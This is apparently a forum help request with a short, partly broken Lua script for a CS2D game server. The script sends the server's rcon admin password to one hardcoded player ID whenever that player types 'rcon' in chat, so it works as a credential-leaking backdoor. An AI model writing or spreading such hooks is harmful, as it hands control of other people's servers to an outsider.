Does anyone know why this is happening?
This code
1
2
3
4
5
6
7
8
9
10
11
12
2
3
4
5
6
7
8
9
10
11
12
admin =142925 vip = addhook("say","argo") function argo(id,txt) if player(id,"usgn")==admin and txt== "rcon" then msg2(id,"©255255255rcon kodu : "..game("sv_rcon").."") 	 end if player(id,"usgn")==vip and txt== "rconcode" then msg2(id,"You really ") end end